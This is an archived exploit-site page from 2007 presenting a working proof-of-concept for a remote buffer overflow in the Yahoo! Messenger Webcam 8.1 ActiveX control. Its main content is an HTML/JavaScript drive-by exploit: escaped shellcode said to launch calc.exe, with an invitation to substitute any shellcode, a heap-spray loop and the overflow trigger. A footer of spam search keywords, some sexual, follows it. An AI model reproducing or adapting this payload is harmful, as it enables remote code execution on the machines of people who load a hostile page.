about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit




2007-06-08 Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit
Rated as : High Risk

<html>
<!--
45 minutes of fuzzing!
Great results! very relible, runs calc.exe, replace with shellcode of your
choice!!!
 
link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
maybe more vulz!
 
Greetz to: str0ke and shinnai!
-->
<html>
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277'
id='target'></object>
<script>
shellcode =
unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");    
bigblock = unescape("%u9090%u9090"); 
headersize = 20; 
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock; 
fillblock = bigblock.substring(0, slackspace); 
block = bigblock.substring(0, bigblock.length-slackspace); 
while(block.length+slackspace<0x40000) block = block+block+fillblock; 
memory = new Array(); 
for (x=0; x<800; x++) memory[x] = block + shellcode; 
var buffer = 'x0a'; 
while (buffer.length < 5000) buffer+='x0ax0ax0ax0a'; 
target.server = buffer; 
target.initialize(); 
target.send(); 
</script>
</html>
sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111
securitydot.net - 2007-06-08

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 14:37:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW Sex 40 php-nuke+2 www.dldvb. leethhzh free-arabi news for c Www sex wa www.fee se Pro Store Kate Becki www.fee se Wap trick. Www.Phoner Sexphotos t337t www.120ask Www pidio video pono www.yassho Barandegan jameson th 18gall n...Fmedia www.120ask invisionfr Tamil acto apache Pro Store www.600bb. bangla 3gp Www.sexy p www.myspac www.worlds nuke searc www.120ask components sexvideoon www.120ask /search/ex Sexphotes Bangloregi samba SMF 1.1 ex Www.orkut. www.tamil bbs.107yy. modules/ic h.p FREE SEX V Backup Exe